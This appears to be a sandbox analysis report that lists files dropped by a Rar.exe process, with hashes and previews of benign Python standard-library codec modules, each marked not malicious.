                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec for PalmOS 3.5.....Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='palmos',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14327
                                                                                                                                                                                                                                  Entropy (8bit):4.653952382312946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:63hsuOTDvRmUrXPLouhIAs2+iRQCzJHDCYbtlqtEDp+/:ZTsuhIAlXzJHftlqtEo/
                                                                                                                                                                                                                                  MD5:6EE7970BA64A9E17B3246A28C7CECD28
                                                                                                                                                                                                                                  SHA1:6B56118465C3E53A7E6C0BECE694E3643B485FC0
                                                                                                                                                                                                                                  SHA-256:F3BDA3C1415D37DD1C314E3F474529913F36F7021279D82DED0D11154EED55F2
                                                                                                                                                                                                                                  SHA-512:FAA196E1B4CCEEB771F9EC19E528696B35EAD5AC6CF1EF53DA092F75DB701FB59DBBA7FACEF3F169BC4D6DBF9336D250E0F4B9DFEE9EF2DCAD32C0FAD31C8A93
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7120
                                                                                                                                                                                                                                  Entropy (8bit):4.519199483696464
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:l3Dt9EqNFDPf3rBEX2M+4lCQ57+K6AWujvRI3:lRSO/SLV5SZ
                                                                                                                                                                                                                                  MD5:DB14BE3F7A2ADCBCC07E2A32AD0A7198
                                                                                                                                                                                                                                  SHA1:A4F5C43558E47C3F89EB807FEFB2F49119D51B75
                                                                                                                                                                                                                                  SHA-256:823D1424AFA9508EA425F667F787567C80A6A28AE9742C66AA90A829ACC19748
                                                                                                                                                                                                                                  SHA-512:5D572DF2302FF9F74BB4E5F884F8057CDEDFB7BC6C53E82809627BD982104CB42A595B3001C8B65E5C087E94CBEDBC088951ED0EBF0D3AE3C4D88823F3C89BA6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Codec for the Punicode encoding, as specified in RFC 3492....Written by Martin v. L.wis..."""....import codecs....##################### Encoding #####################################....def segregate(str):.. """3.1 Basic code point segregation""".. base = bytearray().. extended = set().. for c in str:.. if ord(c) < 128:.. base.append(ord(c)).. else:.. extended.add(c).. extended = sorted(extended).. return bytes(base), extended....def selective_len(str, max):.. """Return the length of str, considering only characters below max.""".. res = 0.. for c in str:.. if ord(c) < max:.. res += 1.. return res....def selective_find(str, char, index, pos):.. """Return a pair (index, pos), indicating the next occurrence of.. char in str. index is the position of the character considering.. only ordinals up to and including char, and pos is the position in.. the full string. index/pos is the starting p
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1581
                                                                                                                                                                                                                                  Entropy (8bit):4.656023184812778
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:5UeC1AIc1eq1AIrZ1+A1+0uwY+vIvBTKXgCJxHjH:5Uj7c1P7rZdBu6AJTKVrH
                                                                                                                                                                                                                                  MD5:096A80038FB883522A68E9E6C434C6A6
                                                                                                                                                                                                                                  SHA1:3FAFAD17359B000B8A417446E15D69EEE44A10B2
                                                                                                                                                                                                                                  SHA-256:4BF9A405B6F2359E5B931E0D9FB9BD9609B013688CE2E58AEBBD9BFCB119A356
                                                                                                                                                                                                                                  SHA-512:8088AE700A1C85C55BA10FE47EEC68193497DDC5145069C48D258604273F284F46A42D5F83D43D826A2C11CB1E71692A0D4D15005D63800F072DD883BA7890BB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Codec for quoted-printable encoding.....This codec de/encodes from bytes to bytes..."""....import codecs..import quopri..from io import BytesIO....def quopri_encode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.encode(f, g, quotetabs=True).. return (g.getvalue(), len(input))....def quopri_decode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.decode(f, g).. return (g.getvalue(), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return quopri_encode(input, errors).. def decode(self, input, errors='strict'):.. return quopri_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return quopri_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1378
                                                                                                                                                                                                                                  Entropy (8bit):4.688171660474759
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JKmSEHV0yWfBx1yWfB8MufQfBxCb+nh5fBiiUQWSJzWSmi1GfBX9ZKj9UnQJxlTt:JVST31u0WMp6SJ6SL1CBTKanQJxHf
                                                                                                                                                                                                                                  MD5:7B4C09E92D59EF6722DFCB9C79B792A7
                                                                                                                                                                                                                                  SHA1:F413714763D5BC134CE873FEB69A4D79735C381B
                                                                                                                                                                                                                                  SHA-256:2CC24FFC2D06CAB80423ADA94E3DFFC02C010346E17EFC2FFFE86825A6E07808
                                                                                                                                                                                                                                  SHA-512:9584CF7FDC438C9E1D00CA3387A3F8AF103B3DDB41A65768131ACC5F3E7D40AF180D1991EF613451B2736E20D963BD2EC08F48106C15146134C8A42BB6A64D3A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'raw-unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.raw_unicode_escape_encode.. decode = codecs.raw_unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.raw_unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.raw_unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.raw_unicode_escape_dec
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2561
                                                                                                                                                                                                                                  Entropy (8bit):4.800734764439435
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:7Hk1rNJm1rNJbuvNJTNJi6SJ6S0TK/JxHjRohn3xrUAosYDYKQyaDl:7EvJmvJbu1JRJivCTK/rSh1U8eSyol
                                                                                                                                                                                                                                  MD5:15F4EDEE2C94C2FB2F07435332C7A25A
                                                                                                                                                                                                                                  SHA1:D110DE2410DE8170389F26082E79C33EA643C991
                                                                                                                                                                                                                                  SHA-256:DC6052650356095A92A8CB3A6C63300B7F51A63B6CD3B6F636350B5F22CDA32A
                                                                                                                                                                                                                                  SHA-512:B9A21BB0C6AF53193088CAAF45FD94AAC472FD87927281198D88E70DE07F5D938CCAE2D081D737DEA9C6D11ACB53DCF1E2E855B464DA9871B99D522692492EBD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#!/usr/bin/env python..""" Python Character Mapping Codec for ROT13.....This codec de/encodes from str to str.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input)).... def decode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input))....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return str.translate(input, rot13_map)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return str.translate(input, rot13_map)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='rot-13',.. encode=Codec().encod
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1078
                                                                                                                                                                                                                                  Entropy (8bit):4.563549974626686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:n5SqSOzff/XokKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9RcJxFplR:5Sqfwm62VJjRU8njOxLnrxLbrLKUJxTz
                                                                                                                                                                                                                                  MD5:9C02A2E9711192F5738426F6E7285B5C
                                                                                                                                                                                                                                  SHA1:6AF9532F9C07B806DBA9D248A17E14B3EE637B1C
                                                                                                                                                                                                                                  SHA-256:195C87BF032904002D5ADB51C256AE14D99F4A69FFC15C989CA34DD51FC203D7
                                                                                                                                                                                                                                  SHA-512:3607DA04E5A83C27B8F6F3223872BF7957B58EA8326E19ECEB6A5836DD4E35B1A27CF43BBB4250E0CF0B931BB4BBEF6290FB6D30BEF407CC8C137277DBEB85D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# shift_jis.py: Python Unicode Codec for SHIFT_JIS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1098
                                                                                                                                                                                                                                  Entropy (8bit):4.636186915032078
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:njqMsOzff/XoRKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ocJxFplR:jqkwF62VJjRU8njOxLnrxLbrLKHJxTz
                                                                                                                                                                                                                                  MD5:0440951B33F486E65DB5176D5CF99851
                                                                                                                                                                                                                                  SHA1:D6269777856EC9BB88F7A0413A55EBCCE3BFBE17
                                                                                                                                                                                                                                  SHA-256:B806ADF317A9920E69A1DEB14C7F078F0D5A9BD26BD370C89492F4DD296AA52A
                                                                                                                                                                                                                                  SHA-512:A92FF2A9EB64C6E42E4CB808823E1B88CD760EC83EAB27BDAAB974152FB2B8DDC2288F800BE85A622F79304DADFD7E96DDEF86FED3434B73CC53967F873BBCEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# shift_jis_2004.py: Python Unicode Codec for SHIFT_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1098
                                                                                                                                                                                                                                  Entropy (8bit):4.656971526890629
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nAqqOzff/Xo2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9PcJxFplR:AqHw462VJjRU8njOxLnrxLbrLKCJxTz
                                                                                                                                                                                                                                  MD5:CBAB0DA456CE49672F8A5CDB79018312
                                                                                                                                                                                                                                  SHA1:A682827169185DA5BBA2B498BF0302B2EAE087A7
                                                                                                                                                                                                                                  SHA-256:16BE3CDC9EFA7C3A6EC5A683BC03BCAA9DBB41FCC70C92900130175A761A9D62
                                                                                                                                                                                                                                  SHA-512:EFE6CF1021E7FEEF474A3C0E0B346515410716DA6536488765803F2DBD1DA2A217F23F64484634C8EDDC149086F1AD82D563EB9A7C6319976FB852747CCCCF9D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# shift_jisx0213.py: Python Unicode Codec for SHIFT_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12607
                                                                                                                                                                                                                                  Entropy (8bit):4.621772981576072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:WHhsuOTDvR2LUrXPLouhIAs2+ijLf00pC8i5I:zTojuhIAl0H8iG
                                                                                                                                                                                                                                  MD5:D9690A0F4A8779777A17C8E04C5EA6FF
                                                                                                                                                                                                                                  SHA1:F10E74D2FDC0BE0582B97094F50BF4A38320C6FA
                                                                                                                                                                                                                                  SHA-256:18AFE3A0FD28797D71762EAFFADC9822E0CB8832BE696AF2298F6727AB92627F
                                                                                                                                                                                                                                  SHA-512:48AEBA9D13106BECC3305F42FB4C0A9B9D3A5663C807C7B42FAC579229D9FD43E2F15BBE3AA9DB6C19216334F296D584308BB12D93C4D998D0AF607ABB621BAA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec tis_620 generated from 'python-mappings/TIS-620.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='tis-620',.. encode=Cod
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1348
                                                                                                                                                                                                                                  Entropy (8bit):4.667992147176458
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JldJcg5qSEH6e1cUe2e1cUeFMufKUeFhKUemUQWSJzWS09ZKj9EmIcJxlTpf:JldJ9ISo1ner1neKuhe5em6SJ6S0TK2M
                                                                                                                                                                                                                                  MD5:7C6EF4AB65DA0214127F4E70CB74D180
                                                                                                                                                                                                                                  SHA1:01D2D4FAE5C7C55DDD33CE3D5DB95BC56EA68E03
                                                                                                                                                                                                                                  SHA-256:E882AD26197F05AFB20980407787F77D18E234F562E6EC396B7D9DF3C7EEF5FC
                                                                                                                                                                                                                                  SHA-512:2DEC757B249BEC760DA00B5269D51C2F7ADEF574FD68A188B64304EB1B7974C84E0B4AB89A138764203D89231DFE76AA4784C466B384655B26D510FA58522E7E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'undefined' Codec.... This codec will always raise a ValueError exception when being.. used. It is intended for use by the site.py file to switch off.. automatic string to Unicode coercion.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding").... def decode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding")....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1350
                                                                                                                                                                                                                                  Entropy (8bit):4.660145850496412
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JDmSEHV0yWcBx1yWcB8MufQcBxCb+nh5cBiiUQWSJzWSmi1GcBX9ZKj9jQJxlTpf:JaSAE1uzWbp6SJ6SL1tBTKpQJxHf
                                                                                                                                                                                                                                  MD5:C939A021963EDD01807CDF57B08163D7
                                                                                                                                                                                                                                  SHA1:5549D399865582B0A802D950E8B3B7FA4474D726
                                                                                                                                                                                                                                  SHA-256:1D1372CF4F46E2F99820070B78563BD3EEED60FFC43A932B483CC7918F3DA5E9
                                                                                                                                                                                                                                  SHA-512:8BF2450C2A44B4ED7B9E901C425AD7BA114E9B946E69FF0DB36644DBD82BF85266EB487C373179F50DB983CE0A51A03E52F43539F92DBC9BF69D39F5DBAE7753
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.unicode_escape_encode.. decode = codecs.unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.unicode_escape_decode(input, errors, False
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5391
                                                                                                                                                                                                                                  Entropy (8bit):4.3113332789517
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:JgcgiEqCubuY5lRlE2GRCGEFdIXv5lLoQyLt6ofvBUpzdft0iL7+9WiV9lkip8IB:aruCouolRaRCRIhlL7yLt7vYfLL72blt
                                                                                                                                                                                                                                  MD5:2867E58C229EB66CE2FC8704F1E380D2
                                                                                                                                                                                                                                  SHA1:57CB01EF3A3CD16BCCB814C86A3B6DABC379B7C4
                                                                                                                                                                                                                                  SHA-256:FD85A9D634B6F3868D6777E2B0367643571B3E61111B87C79F65DF3F57C7ACB3
                                                                                                                                                                                                                                  SHA-512:7E08E1F9FFCF68123DA6B5B531ED0040AE652FC00DCCEAFCD2B4AF121CA627ECF7A4F9DC6AEB44EF8C040414F27BB3AC0B31FAB030A7BB6D5C2491CA5161CC12
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'utf-16' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs, sys....### Codec APIs....encode = codecs.utf_16_encode....def decode(input, errors='strict'):.. return codecs.utf_16_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_16_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_16_le_encode.. else:.. self.encoder = codecs.utf_16_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... de
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1079
                                                                                                                                                                                                                                  Entropy (8bit):4.776020747108792
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JMSEVyWuq1IjaatMufQBb+OyW80kzyWEzryW79ZKj9kJxFplR:JMS1q1I2aCuqEzSzhTKOJxTz
                                                                                                                                                                                                                                  MD5:71C7BEDB2761CE2BCD7D4AB422CF4F40
                                                                                                                                                                                                                                  SHA1:9BE6A38B88716031ED83825611C3B010284C3677
                                                                                                                                                                                                                                  SHA-256:16329B46D794F4D13B38A7A2540002E72E176D85237872CA3A24BF3C90D7665C
                                                                                                                                                                                                                                  SHA-512:D72E83FB2FD71EED49EC72F9B99B87A0341B2923091C6D92B5DEAB7C380418F8BFB868EE064A76FD321EBD2C2D8560A2559D76401730F199870374B4B555E35B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'utf-16-be' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_be_encode....def decode(input, errors='strict'):.. return codecs.utf_16_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1079
                                                                                                                                                                                                                                  Entropy (8bit):4.763394951954305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:J+SEVyWMq1IjP8atMufQfb+OyWPy0kzyWuzryWP19ZKj9qJxFplR:J+SHq1I4aCuYizgzXTKQJxTz
                                                                                                                                                                                                                                  MD5:E34C5A24FE48A17FCBFC4335389F6C4E
                                                                                                                                                                                                                                  SHA1:4FD9811F688CE9ADDF6B1315600707C46BA02D56
                                                                                                                                                                                                                                  SHA-256:6D3B04F3ABD9FB6151FEE5CA0426C2E7ED2677EF1358C269747FF8946FFC02B9
                                                                                                                                                                                                                                  SHA-512:2FE8D6111B3A81F509BB67AB452CEDF9721501222F16E3CCDC4E412BF7BB2383317269ED4059E2C1E82434EF6830794A6EB8AA7DDA2E6230290A8027E601BB10
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'utf-16-le' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_le_encode....def decode(input, errors='strict'):.. return codecs.utf_16_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5279
                                                                                                                                                                                                                                  Entropy (8bit):4.273683297819166
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:g+tqC0buY5lRlzeRCGEFdIPv5lLoQwLt6ofvBUpzdf/0iL7+zykV9bkMpZ/ut1fA:DkCSuolRMRCRMhlL7wLt7vYfVL7qbbpd
                                                                                                                                                                                                                                  MD5:616CF58B40671374C8A7BB69A3EBC565
                                                                                                                                                                                                                                  SHA1:2F71BE2439277B332CC255B7E0B0F11AFF9AB090
                                                                                                                                                                                                                                  SHA-256:97F6038F368954DD48BE9B5FA41B1395A71FCA0271B0FEA69F8E16F9F6633775
                                                                                                                                                                                                                                  SHA-512:43D921D34974BA356A0AE3B650516B7E1108DBFB10618BAC22A0485A5AD1B55D73B1090F77C69C67ACD0C3BE231E4DBD02A32040BCF88FA646610C91F819F341
